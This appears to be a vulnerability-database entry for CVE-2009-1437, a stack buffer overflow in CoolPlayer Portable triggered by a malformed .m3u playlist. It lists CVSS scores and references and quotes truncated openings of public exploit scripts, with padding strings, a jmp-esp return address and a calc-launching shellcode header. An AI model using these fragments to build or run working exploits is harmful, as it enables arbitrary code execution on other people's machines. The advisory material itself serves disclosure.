CVE-2009-1437

Published: 27/04/2009 Updated: 22/02/2018

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 945

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2.19.6 and previous versions allows remote malicious users to execute arbitrary code via a long string in a malformed playlist (.m3u) file. NOTE: this may overlap CVE-2008-3408.

Vulnerable Product	Search on Vulmon	Subscribe to Product
coolplayer coolplayer 2.19.1

# CoolPlayer Portable 2191 (m3u) Buffer Overflow exploit # Credit To Gold_m wwwmilw0rmcom/exploits/8489 # I test it 12 times but the 13 is worked but i dont know maybe it work in first time for you # By Stack chars = "\x41" * 212 eip = "\xED\x1E\x94\x7C" # ntdlldll jmp esp SP 2 FR / EN # win32_exec - EXITFUNC=seh CMD=calcexe Size=351 ...

# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## # # CoolPlayerp Portable 2191 (M3U File) Local Stack Overflow POC # # # ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ## my $chars= "A" x 4104; my $file="goldmm3u"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE ...

#!/usr/bin/python #[*] Usage : coolplayerpy #[*] Bug : CoolPlayer Portable(m3u) Buffer Overflow exploit #[*] Founder : Gold_m #[*] First exploiter : stack "he is my friend :)" #[*] Tested on : Xp sp2 (fr) #[*] Greetings : All friends & muslims HaCkErs (DZ),snakespccom,secdzcom #[*] Note: I didn't know why the stack's exploit won ...

CWE-119 http://secunia.com/advisories/34816 http://osvdb.org/53885 https://exchange.xforce.ibmcloud.com/vulnerabilities/49984 https://www.exploit-db.com/exploits/8520 https://www.exploit-db.com/exploits/8519 https://www.exploit-db.com/exploits/8489 https://hansesecure.de/vulnerability-in-coolplayer/https://nvd.nist.gov https://www.exploit-db.com/exploits/8519/

CVE-2009-1437

Vulnerability Summary

Vulnerability Trend

Exploits

References

Vulmon Search

About

Products

Connect